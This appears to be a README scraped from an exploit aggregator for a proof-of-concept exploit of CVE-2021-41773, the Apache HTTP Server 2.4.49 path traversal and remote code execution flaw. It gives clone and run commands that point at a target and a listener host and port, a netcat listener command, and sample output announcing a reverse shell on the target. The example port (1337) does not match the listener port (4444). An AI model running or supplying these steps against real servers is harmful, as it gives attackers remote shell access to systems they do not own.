Share
## https://sploitus.com/exploit?id=0FE113D7-8253-584F-AC12-EC82B832F461
# CVE-2021-41773 - Apache HTTP Server 2.4.49 Path Traversal & RCE
![Security](https://img.shields.io/badge/Security-Exploit-red)
![Platform](https://img.shields.io/badge/Platform-Linux-blue)
![Language](https://img.shields.io/badge/Language-Bash-green)

## ๐Ÿ“– Description
This is a proof-of-concept exploit for CVE-2021-41773, a path traversal and remote code execution vulnerability in Apache HTTP Server 2.4.49.

## Vulnerability Details
- **CVE**: CVE-2021-41773
- **Affected Version**: Apache HTTP Server 2.4.49
- **Vulnerability Type**: Path Traversal โ†’ Remote Code Execution

## ๐Ÿš€ Usage

### Installation
```bash
git clone https://github.com/adrianmafandy/CVE-2021-41773
cd CVE-2021-41773
pip install requests
```
### Basic Usage
```bash
# Basic syntax
python3 exploit.py -t  -lh  -lp 

# Force exploitation even if vulnerability check fails
python3 exploit.py -t  -lh  -lp  -f
```
### Example
```bash
# Basic syntax
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

# Force exploitation even if vulnerability check fails
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337 -f
```
### Setup Listener
Before running the exploit, set up a netcat listener:
```bash
nc -lvnp 4444
```
### Expected Output
```bash
$ python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

     ______
    (_____ \
     _____) ) _ _ ____   ____ ___   ____
    |  ____/ | | |  _ \ / ___) _ \ / _  |
    | |    | | | | | | | |  | |_| ( (_| |
    |_|     \___/|_| |_|_|   \___/ \___ |
                                  (_____|

       Apache2 2.4.49 - CVE-2021-41773

   
[*] Checking if target is vulnerable...
[+] Target is VULNERABLE!
[*] Executing reverse shell payload...
[+] Reverse shell payload executed successfully!
[*] Check your listener
```